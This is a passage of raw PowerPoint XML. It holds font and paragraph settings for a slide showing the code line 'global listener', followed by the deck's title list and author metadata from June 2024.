              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Cordia New" panose="020B0304020202020204" pitchFamily="34" charset="-34"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" kern="100" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Cordia New" panose="020B0304020202020204" pitchFamily="34" charset="-34"/>
              </a:rPr>
              <a:t>    global listener</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="935400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61</TotalTime>
  <Words>1020</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Consolas</vt:lpstr>
      <vt:lpstr>Corbel</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Parallax</vt:lpstr>
      <vt:lpstr>P. DHRUTHI ROY</vt:lpstr>
      <vt:lpstr>PROJECT NAME : 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payavulla yashwanth</dc:creator>
  <cp:lastModifiedBy>payavulla yashwanth</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-18T06:47:06Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-19T07:29:23Z</dcterms:modified>
</cp:coreProperties>
</file>